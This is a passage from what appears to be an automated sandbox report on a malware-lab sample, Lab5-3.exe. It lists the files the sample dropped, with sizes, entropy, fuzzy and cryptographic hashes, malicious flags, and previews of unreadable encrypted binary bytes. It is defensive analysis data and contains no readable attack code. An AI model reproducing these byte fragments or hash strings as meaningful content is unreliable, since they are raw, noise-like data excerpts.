                                                                                                          SHA-256:DA10D9924B0F2D4AA49E66FDF2EF104CFDAAC3B5458A58573CB0C4EE0F740563
                                                                                                          SHA-512:FF7711004E1EA53B748CFA3F3DA275FCB09C14DA3B461B2F133B081F618AB42FC605C9483FA244ADA82038B0E9B6A527DB4551EC8E88255F72EFCC1B073B4E29
                                                                                                          Malicious:false
                                                                                                          Preview:..p..3..x........>.L..r....'....=..A.../.6.X.Y\.}.).`m...'"..4.O...!.C..;.....g..{.......=`..FX."mq..w.,,..:%.co.....{D.e....0$.1.t.q....v-.qh2*6.y....&...Q.(..@.L.E.;0.u.?.x8..6<~...z..a.7..g..^.T40..="y}...$..x.......Ku.?n..lY.C2.4.....3.lbrY I.......O&RG.Q]..N...TL3....k.G?@Ra.......o...a.VQ>dA#..'..L:.J)....u.:....U^i....C.kh@.-..h .d.I...)...Q.@-..-.<......."r...B..{..9.r.I.0..f....q0.YZTs.xM.....Z.E=.vwC......!7...8.....O....D.d0.W#..c..-.*.J..^.T:......l.iq....i'z.G....6.0S.e.>M...k.....6..........m..1->m...1..#....N.......}...{.,..Y9ioY...x.t....NJ...b......G....%.,Y.C17.1....<6......_...+...6.~...-...>$1....]h.l5...l.Pxxi....D]|/.z.L.@.QkzH.dA8...0}}... ..5.......I..t.g..3;y..s..e.^....C...#80NW..}.<'..l.....\.NY4c?.l.R(.f..H..R.%~...{..@..=bp./. .......g..j.f5..4p?K..'.....L,Z..E...M.S...Z.2}.o...I.....L........2..N(.....OR.."\_f.;.\Rf...o.S.4&.t<'.......FM.Z.-...D..65Ez...PyN........1+.,.W...^E.a..c./6z..Z7M...S.d.ES.c...}>.Ij......H...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12816
                                                                                                          Entropy (8bit):7.98721703643093
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WT/MzgSF1+vyschGc356fiYHFSoBmRpcftMtb:WT/Sv+chFJYszRpMtMZ
                                                                                                          MD5:5DD1C2FCF5E0E3928FE594BF1C6C6B1F
                                                                                                          SHA1:C34D31A1621FB94EB95D61CAB60C9BD4534E846D
                                                                                                          SHA-256:D6E3528A093E73965D2EE609786D507E927665C6493EB48D5718C8E4EEAC3016
                                                                                                          SHA-512:8F1557713AE6E52C2E678306A17602CFAD215FCB33C26F92CAD4F8856CA32903AED192111059E111E2CB43008925526E50EB22BCD77AF224C0867A99B10A052A
                                                                                                          Malicious:false
                                                                                                          Preview:>.{.+....a...YmNL.."DK]..N.][7.Xs.J.m.xq..J}}.Z..c.....U...}....a(..i.r.....ZJ..r..&.f..D .N.w.^...I..q....*@S...~]..i#.U.F.+.R7....~.Mg.."..Q....;DH9.7....3(__.Zv..]..$.../2b.k.o.g.9y.?q.......Q.r.M".h..3.H...$P.F~..=..H.....Q.. ...@......#.'..[...7.#.....~z..q..............`=......}...dW.w^(g..1G..;..Z....T. ey<.B.....J...Y.\...k......v....G*...Y....!...iSGBm...{..%..!..ip.....b...s......sD.o..^#.5.E.}~..3F...0L1Rwr,.E1.....W~.....d.;/a.:.Vt......n...P)..._U(.4$.~=......... y.s.e...U"..pbR..D......qJ:.n]5.=..x.&....&.&..)....X....^.e..V......+a..J.<.3..X..^.$......I..+.:...v...N...V..!..Bf.=wC....7.3.,>..@..?......o{6....+..l?5.....X.$..x0).:.....m.)d3.y...dA..,.kjqi..0.....`&.~9...B...}.V#...'..U.3.2.}.Jq..E......,oV..].d....*1.g|............_nc.q.f...i[..h.I....Z.........y...i....%,Z.4....M..W....,.'...7.....!k.E=.\.se.,.)..?9...G..<...v....yv8e....[.....'.9.......tu....o....m5.,.,=5..0...I..[Zp!+I0..7....#!sT....7^~w9....p..Do.}..f.P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.901171200969597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2lCoHCR6XjVTbmQwcq3RYHfUTid3hBaUoSGFcmeykEdEElU92i:xYHzVlqxGx0uKeY2ElUJ
                                                                                                          MD5:502C6F107E37FCF874A006EC48D34A13
                                                                                                          SHA1:AD09CE418CAE3B5FF298B30B447F65661A7B6B24
                                                                                                          SHA-256:8E75C4ACE37DA01A7A6FF4FBBC27D747F056BFFD05B3D7A150F8E68C73927282
                                                                                                          SHA-512:B89319FC84503BC7334663A06B95B89385A47A56E6F6BBDCCEF1705D4F3862FD2B232BC7FAB69C9196DA7611483653953BD00D7533366BF6F8BBE1A1AED23D51
                                                                                                          Malicious:false
                                                                                                          Preview:....2...=/1.........X.x....=8.P........K.mN. .\C.....|u.Gw..K.......a]......=M....aV..K=['z..D.....%A...*g.........t.;X.-...x..M.U,...@...........38@..y.n0v.L.=X`...6.Y..&).!.5..f..7mW.....|.q.e Y.F|.p....#....Q.8..".].u..W.^!..l..2-........M.`....L..).~.....M.:..._.O.1q...|.^.8..u.k..yA....<...X.........x.b.V...Z..AM...U..eKm.:6s......Rz!R..?..):Q...T.....P..A...&s.G..E{..5.&.dxf..=..1..z0ZK.....7...p.ttq..9....|0e..**>.....t6z.o.........D..D.&!.lf0+:....z.!.dd>4........$....=?......}.YX..19.L.Z.E.0.lMw....;A..d;h[..m........Oq....*....o.^.W....^.\:.y...e..q62.B......>..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36672
                                                                                                          Entropy (8bit):7.994878866872969
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:X8MbMHNURV69dLnv6hNfRFyR4OTsc6LNvZ:NQHKCuN7aTsrpvZ
                                                                                                          MD5:8E93B5D43F8E3E3E65528262A2940BAD
                                                                                                          SHA1:0F4621A88803AE56A49534E712BA677DE7C0B48A
                                                                                                          SHA-256:CBCAF8096441DF78ABAAAAF9FC3C6DB1656D4EBA8047F8CBFF04E7D789984485
                                                                                                          SHA-512:78D465B7B2CB7540F78160D6D2994B8E25123A8AF5345F48F63B9D2D87C7C79E776AABE4481E742FE5B9AF0709949401A3FB1E57FE74115E9E622BE1F1B4552E
                                                                                                          Malicious:true
                                                                                                          Preview:?.d..).......{..N/,..O..t$.....r.y..{.T...6.........s..P.eF...+...d.p..U).....eE...d..E.L.K.B.<^.P...j....Vi...^.5*xj?......;.?*...=j..l#Ka......ZY.4.q..*.......QN.oC..p.....R..80.?....n.....I..x.s..hG...XU.A...X..j...Y.lO..J9.st.....-....1O:.o..]*....k..76|.K.v.B...S.%HL3..i.....i...(......H.W:..OID.p.t.O..c.O>.....y.K@....* %,p..}#...@.c.B..I......_v0N.i..~..K%Ic...|.2.]p(.&....a.....$...$f...a.c].B.:.`".T..g...{.a:.J.....).V..w.}......G..:j?....;.].....G...|j\.l...y.+fN....Bu.......j8(#..).] .....t7.U..7....=_...!..p......f....*.]{yS..^U./...l..(.oPWe|..H.^.A..?.t$m='.&._. .dw.Xg.>...V8..~....]o.J.%..o..e.+....6nz..W..n.|........#.X....Z..9U........y.#.Ua.....+.Q.t.......[6J......I.......)...O\........[x.....e...|..?x..w...........X..}..^RG......B...u.pK..d'...........r..?.~......D.{!.f...#.w.~....p.H..A...E!..R...n9G..M...\..kj.'.....K...x6...HD..o..u.X..s.....I3.........../i.......4..H..B5..O.S.g<..x.@6..!'..*...........|..o........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12816
                                                                                                          Entropy (8bit):7.986114231111929
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1GE/t5SrAvi8lDohoVlQwAxmgMeo1+PGqxMc2Aqdu8J7s/WOb7unW0Cb:1FK8l8NdNAEvq48Zz2uWtb
                                                                                                          MD5:D67235F67F589A3232961F3B8B5F6E85
                                                                                                          SHA1:B03DED0610D2E8132304D436E8B51448C0A3FA41
                                                                                                          SHA-256:A0BD58E5FCEFFA3408EFD866569BAD0299816A347721AA80A1B96B55DBAEB03C
                                                                                                          SHA-512:DE73CFEA04CBD0F3A46D25535DAAF7EC1532A6394EE831118ECBC171548EADE84FAB179409CDC04D300B3190877539A8551B4B5D19EA8A8A6607CEAAAB84E1EE
                                                                                                          Malicious:false
                                                                                                          Preview:...k5..{...e.@U.....0D51.[....Av..\..'.S.....;.f.X'.f.".m[..I.._.Y%57.o.....(v..e...5<1....x*X.......\.d+.`....=q.....OM..z.=.&...\.J=y.../......%.A......^e.[.}.....x=..-DlA.]..F.4...09.r.....St..gh.N....Q....{..'..R.o..00...+...yf...z.y..e.R.....:..X....&...&...&.2bG.B....0....w2.6....?.....[oj..././S..E..Sk...L+....GC.3..........9To$A...FYm.Fj........gn..L..G.q.8.......*.;.`..k...1....\.X...*'..?V^._,]D?.....9ni.L.CW.-.......B|.>.0>-...vJO.nl..|....`.S..%.j+{.]A...P.,?TN.hB..J.V..%.Gj....?w..=. ..;^.g.<.Kt.>V......kt...ah.....P_.lD;.U0O5A.].m.Q~.x...r..!nYi.....8L....g......y..d....I..FJ.~jO..$.rS...w..I.[..w!i.6..e..w...L2Y...g.l..z.R..O...e..x...:....N....Q}sOlMYz.7...(...Yq.Q...)|..a........=.9_..`..%T..B..+s....K.<s.(A6..dLK........>s.."9...|K..4.........Sp....6....G.:0.g..q^...N<..'.2.uR."uu8..y...{.W.(/.@.&.)...=3...:...GiTSh.=..}j..o...U.i./..t.l.....Q.....m.v._%..>u.\...N...sK.i....#'.$.....^mf.b...G..G.Q(. .-'.&..../.......W...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56208
                                                                                                          Entropy (8bit):7.996682031455392
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:6Wwz7QgJ4okRaAnvBsaeq6rdfKrAgTVuJ8VvZ:KzcgJ4G6KzqMdCrAWw8JZ
                                                                                                          MD5:7354F454698B39AB130BF65F15B09584
                                                                                                          SHA1:748CFFDC2A9B5E81B187450304FD3143204B2B12
                                                                                                          SHA-256:5AB2A30A2A5BE2F1CCDC3B627F74320745B4721CC1C1A3871FD9C6190CF8181E
                                                                                                          SHA-512:56FE2947FD0A39E497064091788D2768C3582EB09C5E91BD0A3CE77A7F11D1341B9C1888D851177F9446B14A1646DDA1D7837A322A69810D9D0E5220598393AB
                                                                                                          Malicious:true
                                                                                                          Preview:..`..k..M.....r.Y>.<... ~ ..p...d....-.h.1...a..Ps(sk.......Vr....TF..4y......:x .......[......TI....j..9Y..Gdt.C....LI.-m....Z...Q...........m....,..K..c..+ .a.88.^hl..W.h+#.W.&>..B*..n]X\6.0........+|...E/.G..j.Z._V.@.J.'.C.UJ...DI....-......g.....K#D.-.8.~........s......r..,{..... .qm.Y..r..p#~......A.....&~e.....y.'Hb1.ct..I......"+c.=2..C.....f2r..(.Q.1.U..>>...!..[.r.4..........g..x%zgU........s;..........q.1.....U..U.......EOR .F... .*..k[g.=....A...wK...%..0@.6Mg..C...n..~Iw_<(.>.5..G/C.C...J8........I....~K.f.Z..9....5.r.....(....Jo.F.T.....A.8..0.e...!.-.R...w$.4....n....,Zs2....wR.q.[2..5..?Q".o._T...#g*T...&...,...>..@.K6...e$....J.(.g...........'N"...:...;...yT+..7k..>Z..,.:..+7...>..#.!....i....1.y./..=.4.-..b.Q...Rlj..d.b.y..z...Q....j..n.7...-....%6@..N0cT..a...+s.C..-6M..#[..m....K...\O.d..../.:\@B^......w....... .h...2....4.FlZF..M.82............N.x.;.3..).jy8B..XH..../a..`.I.Xi..+E...n.$=..tag.A%.V@......?..d!).
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37408
                                                                                                          Entropy (8bit):7.9957423098945215
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:6QjQ9Nl6YN+IoF194aJErQVPgSpLTf1s1ERg7mcPGShLh4/0BiZ:hj4pN+IovdLPjdaKC74/UiZ
                                                                                                          MD5:CDA5CF6215511632A05B49AA6B94C810
                                                                                                          SHA1:0225A7A622D1CDAAF246327716F4673CF1BD4B18
                                                                                                          SHA-256:752103568407D8AB9C22B1242BDE04FC5BB6F340BB9FBF97E14E16F10A21B2A1
                                                                                                          SHA-512:03E37C81E589D307BE029ABF8ACB87582CA78B87D8E0F49F37E0FFCCB1993C1CE16C9AD6C7717D2955569C2159F42AA7A3B608690155FC3BB3D1D196AF0F6069
                                                                                                          Malicious:true
                                                                                                          Preview:.U.....q,.fL),`.=.p....hTA'......^Z.m7+..H..D.[h.Y.\'..........uiJ..qd..x.r~.|.3....Y......C.4.... ec.~.R#.g`P>...l&s.........O.......H...A7b...n..p..B.}.^W1.f....`.|[..[Lq)N..%...1$.8>-._][.R.4#.l.......T.tA.IO'..v=M..~.c..w!......{..x..:!;.~....T..p.;.s.........6YT....W.O...m..p. .....{".0........\]3..?...5..2..D3.5.../.....w.......V..5.\F.v^.a.16=.;F3Y.L...jpcET...aU3}?......Ie....}...2..K\...4@E.../K...N....5...;F..?p..w..F{0..p..].L..z#/E......a.U.Jfq..F..^%...'.|#i. .b.U..].`m.;...z.YH4.J|8(p..E7..pR....B...0e....Y.x..F.n.A.......G...7.?\7.E..@..c..*Q..B.d.Z.C..U'...z..}..:0.:.$..dm._4...!lm?L..x....,+.0).<I..4....83M.GbE..Z}....8..P.......{...]Nl.....uY.YR...3.d....V......U.[.....J..............9.'JQi.<..8%..F>.xF.I@..y.D.-I`Q.,...]p{...8...Z....&..j\Fn@.v...K.%u2D.....P....D....0...\.0.^}8.j.K..}.o..].\U...E1r@....7..4......N...@P.0.....,.O.F...u........$..z..5.....iw..7CNk.... .G.d..7w...*..3.^3.p7'/...;..X..$..2.u..0...Bsb./$.AA.k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12848
                                                                                                          Entropy (8bit):7.986110955709694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:/dtu7kNLBGNB+9jOVeALbO5Xl5kW6wSI4lMqtb:/qna8VCj5vSI4lMqZ
                                                                                                          MD5:A4DFF0936775AB26D8547801162D38F4
                                                                                                          SHA1:43896EF3732A9FC26657C4206F1626636CF1DC73
                                                                                                          SHA-256:C83F5FF4698E5E2E9408D47A4A9B16BD4FEFDA5142215F71D84C9C7A4D108FCB
                                                                                                          SHA-512:EAF4EED20D94FA87CE19F4E3EF780461599BD007252B61481750D5E4C2B54405D71EF0A1EEA692D402F8961F8F5A273888A9472DD41281D72A1A760930E194B6
                                                                                                          Malicious:false
                                                                                                          Preview:.U......+.P.*.Sj&...w....c<.k...{..*]F..o.J....&g.(.....O..|M.....`...G.......t.....fO.L>.?v.fy..0...@.,Z.V..........Q.E...%.q=..d.D).9.B1W-..<S..<.ZB.~......m).L\...]9.....a.......i.$..c"uH...}." ..s...y..L..X.^:....b'...`.gE.....(...k<(H.<av...g..a..a..5.....k....~.`.%.....N..AUM..>J.X.I.WT..)sW&Hb?..B.1...i.]y$...$.j..}.5*...#~...8........^....d..s....5.lNc.5....O...#.pe.kL.5<lt.WL ...1...jG...608.`c...D...^^C.h.~.E..>..zr.A.~.......)..:.R..iu..}{s\....N....X..fu=..Z..6..f.?.b.eVS..D........,Y....._....c...!_....).iv>..I...Z.A.R....q...a5m~.&..d......!.%O.p..wtF.Z....s.Z.~gd".Plw.p..H.z.W..H.j.|...2p..B.).........>.....G......>&.....ZE..KOY...*;.......m.....K..Z..+........~ogK.lvxr.W..i....pi...)K$...Z.I..'.TD..q.....1..ZN.6J.........J..5\...}.\+y..5.oW.`._.{.Bv..$.....n....@.TEw.....X.g:....\...l..ZDIZ.p..0.{I.D...............r.bf.N.xjO..H.ru.c.l=..=0.../Q...F....H:a..CE.............o......[w.*....5...../.-+....N.....BN.|Xz,....U.i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):601360
                                                                                                          Entropy (8bit):7.125602707147894
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:QuRoSn16a3AmMzqnrXotwvjYao24hnmq0VSUvGCe9:362bWqnrXaSjGX8Hw
                                                                                                          MD5:05E42553AC63069FD39B5FAF7B12AD74
                                                                                                          SHA1:65B7162B487D332BAD177E9CBF129CA2937859B3
                                                                                                          SHA-256:8AB2DC0B5C06BC927CCFC9519FB3F82482F61C006B7F05BE64B2E1C4CF4CBB39
                                                                                                          SHA-512:6BB98BA7C8725E767518DD32B90A9C9B8EE63EA32E7BE3345107CEC117245333BAEC09A2B5F8A398ABED1672A18E61A101454DE5F9CA808466463E44AEB584A4
                                                                                                          Malicious:false
                                                                                                          Preview:eX{.&.\..\....W...../....$.A.%....rP.H 7.4T.Y\...".-..!..c........x....c.....d.'`..B..G$Z.\..a......#z...........\0.N......p<lN.s{..S.F..;....Y...4..z.<6.k..Sw.....M.`....c)......E..u......\P..$,....."Y..=I.d..n.(..V.0O......HYF. .{...cQrG[-.s......PCr..d...{..6ue..L.x.Nd.(..>f$.....0..2d&.>..`...+..~l..Vep/...7.l.4.r.py#.?.o.xx...|.x..F..Y.:...S.....B?H:.H..)+K6.,.lZ..s?a..-.*...........kO.g.....R..7.0Z{.>n.F..@[(k.&...xy.SNMU............A.5...4.3..u.k,.......Q..{...8 ..%.e#.d....Z...K.oS:.2..z...lu..E.x%..)(..........7d.R.....{..E...&.....$.+zmlj.6..i.yqs..."+.e...AK..x.)o..tO.T.b.../..G.Oz..m.w..d..$j..A.x&#.=g..?.X=..b.........<.6B.b.+....N.O.....;...qn.n..n............L..=....`.n......./x...........3....o9w.F..Ie; S`...6t.L)....f..L|...6..c4Xj...+..Q.y%..4C...U.o].P^....R.[Z.H..N.....f...oHd.;.....9.Q`.&BT...].......~.w.;F".....,........Ll...R*.....Y...|...k.O>.<..h.P||r...%jT.?J.....4z...Ed..!Aa.z.KI.(E.\js.#..^..Y9...-.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.895272936499707
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FWSurDIixi9HfUTid3hBaUoSGFcmeykEdEElU92i:FWRjiWGx0uKeY2ElUJ
                                                                                                          MD5:B402EFE0A44903D55EE969333FBDE4B1
                                                                                                          SHA1:CE74DC0955ADD22A498EF0D0BF356E4AA76FF1FF
                                                                                                          SHA-256:5F04F0096A7117ABF8D0E2D106927450248E3C96E09533AE12716D054A3AF418
                                                                                                          SHA-512:903304FBB628F934CBEB6E7973410E20402482722018924366039397B68C9F8F27437A510D0FDC4EB23D3C82B94A13FADE885A136A13C0BBD481AB22799D21CC
                                                                                                          Malicious:false
                                                                                                          Preview:.........g{.i..'p...h.5J=m.@o...ZU..^J....(l....}.......&Q.8..:.L.|a.M..i..37....q.K.W.)I.....rZ7|d...V..0...$..0.Y.rNw[..@.UvV.Oz(}..\8.9T...~..9..........1..Y../.'.3....5.8g..oo.Xa7f....y...U....a..zs~....(..,'..n...|.7.S.+M..4.....q....).......D.E.{_...&r....y.w4..\Z<....M.U~...x......".Z..K./..b{[(..e..2...p.3<c.H.h2.*...H....b...:.$).....q..d...{./.6.6.S.%...*..f*.W....(...X.m...}D..../.f..]EW.>...Eb..5.A.Y<.*\H ..7..Z].>...`c....+}.Iyy.u..]mV..p{......h......=./ .....!...b..Gy.=.O..}T_..].`+...a#....w..W8J...8.....o...E.o.w\....^4..)7U~n...n......L.S..<)......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30496
                                                                                                          Entropy (8bit):7.99365095908884
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:J2YXFMSQiRZL/8FbCRBeBAVAAlSpuCA9ZFWTfW9EZ:J2YXFR/LEAR8WBnCAPFIWaZ
                                                                                                          MD5:A7220F95D6980811855422114B39F63E
                                                                                                          SHA1:5914EBEB1F0F9CD93F99EC809B0452BA5BB233B8
                                                                                                          SHA-256:8E618A94E8EAA445D0910E89BD43AF666B3C71028B6FE7B0ABF429A3C113C05E
                                                                                                          SHA-512:6E8944B3E4B5C1AB49F22C0655DDFA201EAD696A84A2D34C19BBFEBE1185EBA51E8F541EF6B0529FFB35BD80FDC641C5C93D474252FBBF570C42F9629AEF9498
                                                                                                          Malicious:true
                                                                                                          Preview:V.U...'..k<5...~.b..x_l..K..#]....qq..d..O.W......,.L!......J...Y*.r.K.'.O)...y{..d.jL6"1.+@8.Itq.t.IxZl+.B.@.U>...:*..(e..-..X..u...Pu..Z.p......,X.d7k+...$.z2......"..b$..ew...".\.[.v...JCU.;5<..4 .SO$..;........|..!}....$-...z...5.z.l...u..._y-.....Z...#P;Pqc'....1......,.L._.CIt.fN.4...`wW.}.jl:..stM.s.....A.&Ax...K="!...X..m.g..6_...U..;..-|.k.K..IM.+..Q,z.!U......l.b..W..a..h.9....$m......l.A...wo..K.\r........8~e....&.^J.D....-.U.3..:U....o^.(...>}...l.e....P_h~.w-..p.........:...IO...R>.:.>..B,...r.E`..)c][q.4.PZ?.b....}.}.x.JhXi.O....]<.|J"%..i..nb.%.......[...+Ep..7xX...O..(.+..".........n.w.b6......av....D....l.dr...]..."2...E.YP......L....j.......^J.4.x.].`.E...\...}.,zqw...@.4.=.%.d ..c..-a.={.Z.....T8Q3.UA.....U.:.. .bPK|....h..n.M]4i.Jz....g8.*8q.Y.._.U.S.VmE..@.a....?.`...&.s.8.F;~J.Y.H8c..Z...:+.a.?r....fI..o...z..W...N.I............./eC....a.bh.....lG..h...:....q....{..'b.>.wN.]....y..a...}..8..bu......3>P.L.x.M...9.@2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12608
                                                                                                          Entropy (8bit):7.984457729259471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WeLSmRHwtBhE+cmJrDCsM+Xl2KyhsOKs31tb:WeLxRHwSdy3Cs5XlNyhD31Z
                                                                                                          MD5:1CF97D7FCD739356DC0DD311C9ABAEED
                                                                                                          SHA1:A4DA5665024355DE6FB05330E7B6DD5DAED983B9
                                                                                                          SHA-256:FAE45EF9F4D99AC45899109267BA22FA58624A3ECE432AF2D011CF1966494D83
                                                                                                          SHA-512:0442E4943D7E89BF230E369430E2180C9F77B4B56B731367C3465462A49B92852315A6E447E57637C9127FE5E500CEA5BDF63B3A90F832B5990FB1F2452D0788
                                                                                                          Malicious:false
                                                                                                          Preview:..~2~.^.p.....7.%$.....x2.......IuV{.0D!..D\.....; ..[.....;zf.y<...Q.S4k.....u..g..Q..g.3..H..m.S`......`...=$lV...7u.i..).>Y...W.\.....u6...5.s....q..tr..6...[{ ...ws.....T....v..E.,hJs#..ztD.n..\.r...Y.|Z...xD..Z._.{.....,...i....Ll.]Y#.ws.....H}T.0..........\..2.....]....W.b...f.N8.*.B...U......o.%]<=.S...XKs..R.*..\..E.Y..<..hK;..... ?Cb.r...?YN.....IO....r...8<.#\.z&....N7.:..@...:...}s..T.#,\}7......z.P....3.T..1....G...,u..8..-V7.Z.|...|.7...f.. .~..e.7.....eM....?.P....Eu.@..4O.XkY...<.....:......o"..).......:.Z7...BUe.N1.H..n.V.m.......-..*...4..DL..S{.3..n+....y.....q.hv.........D.T.....E,..m...y+).Zf..|(.*@....\..9.q...._O.*........D.B..V...Z..!.R.^......^........u..>.H$7....J~T...\x..5Q..z....d_.S.v2..sH.....3..;Z......Y...~5.L.......DS=....>.&.E.....gw.]/.....}G0^.`...W..V.....0.\(..$P.A~.9./....\...h......G.~....x`.|\Q..2..\[....~.@..m..*%...,..9.....)AXe.9..Y...q.....o.g.W........!.p...g......S....*..:G..C......NRv......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):78496
                                                                                                          Entropy (8bit):7.997578491773996
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:5n/CcAA6CGP15x25AAx1a+saNOxXDMZoJKYDu6pyF7qwHnKLoBQg2eiBo5Z:J/NGN58RZkpMZoJ+6pydqwHKMZ
                                                                                                          MD5:AE34D52E8F14F46B6DFC12AD54716F8C
                                                                                                          SHA1:6CFE7318AD85F4A0D097AB4523473E83B93E3E95
                                                                                                          SHA-256:537CE4C917762D9A7ED94F474F73EA4A704E8A75F792C5726C38466E9DD704FA
                                                                                                          SHA-512:109CA81E6EE7256C2597DB3ECAE30C7D69F5F049AEDFE51A1B36CA9EFD483AD6DDF4C7C2931FACE9F7DD8E96B00E9D73D567473FC34DE15E7446FBD102815AAC
                                                                                                          Malicious:true
                                                                                                          Preview:..T12m...rR.k.#Lf..^.~.x.......s..4.%..wA5M'T.o0...C..9.J....-.=[...3.".7.b..E..Z..V..T{...^....B..C.U....,..n6!..AcU.'. ..DPb9`..q3.h#...e^.l..Z,..o.]...Z.\..a....$I.q.5k./.6\={......7,.V..f]...I.`.z".WQqM..n...9...._#..N.J ..oU.m.c ..9We-...=..=9......^5O.mx.3E`...P....|..q......tDU..&.p.~..P......h...Va.L9.....$...ddHb.e.$....;.y.W..K..Tw,?C....c......u....{...T..~*nD.jX...'.. ..Y.9..Gku...Qx<......@..K..~h...(..^..xM.7C.h..n....b.,.5....;*.V.lU..z.#.Nu.G...?..n)...C...\....Af.!_>N.....g..kb...0..tK.3.B..B../.wy...c...g=....P..G..,.....k.l.T]jd....|9V}.x.....^Z....u{`A.h....TJ..X...3o........*1.l-..e.L..yT<$MG.X...Ck....D...>\..0<..2K....*.[...bg.....k#T......D.u....b.{/.=..\k.*.M...zQ..1..<S..S+.[/f.E..``6.0.;.c..b.c4,H...K..O.W..*8(..:.|.G.K..Ch.h.j.uH.&[o.....t.....-..k.U..:......#...+7...X4....p......it.hx........W&}..P....!.PiE..F..C.....r.[.n2g....Pc{^.q...l....qd..<w..C.7.].. ....n.>.....2.?.LL...#.....x...oy....Z.&..;.....s!.X{.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15248
                                                                                                          Entropy (8bit):7.989251398203396
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:JDVeqQaKEiDgDh+MW6++A65615DGxbCom0Wtb:pcqQaKzGIMW6++x5SlGkZ
                                                                                                          MD5:E749BB8CE972A3BD488330ABAD871E38
                                                                                                          SHA1:7303CC35C0220BE31FF6D7B4F62B3F85CE7D7622
                                                                                                          SHA-256:BB738C4B89BC412A705B00C3D3EFEBC1CAEA9201D692AEFD6635D2AC98ADA8F7
                                                                                                          SHA-512:911994D5D87C4FFBEB72011C4B7522A5EBDA999FD369609E37455313FACD7BCC0A8E308F63EFB09907B94FD8CB0C8CDD55ABD0A4DBB0494A3140BCBA89ED95AA
                                                                                                          Malicious:false
                                                                                                          Preview:.T..S..U._....C....X....[.).......n.^......&.wj\....H..I{?..+...o~.r.....y....pn.(.?....M.UG.....I.;... .....o}.D...T.. .....H.$......Q-+uU.....U...H6...].>!.`.5..Kr8..)#...v]Ii..sc...P.....9....e:..5..:.W.\pGN..~+..|tCY..w1...3W!.e.O.wT S...;...{.;...\..EL..v..?..8.....5..U....c.Kp.H...i.&7+.hG....ro...eDP.;w%;}.g y.Y=......\\.2.k5.:8K.....(.....R.^^......6I..r........X.....e.$A../n.fd ...b.S:=........f'...J.B'....2....6e..}..ND.9....I.R.4..6O.c!T1'.RX-..g.4....pd.....m....A..y.....qm),.`9.x j...."?...r-y#Y..xr{+..j....x....bN...8...gK......b1.{U..2%+...7wF"....2h...<.....q'c..5...t.....2t.Ai...F..i..tO.X .'m......-B.>......gc.d...k...s.Oj....g....pz.r~.j....9..<....H|.Mq..K...j&-.H.;z......#..\.......;......wy.e.._.n..>?$._p.........ghi.Y.g.w*.f..q..6<.._E..%...bT..n..D.....L..-3Q.p...\Ys.W.3t..s..Y...Og..0..!5{l.<..)..@.Y..9.@...HB..2.(f...@ux.|......Z..l5...p..f......p..(.6A.Y3m..$.`5B..W.iJ......8j...s@(.\7..h.a.-....W.On_@..q..)..dq.(....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.986345127033785
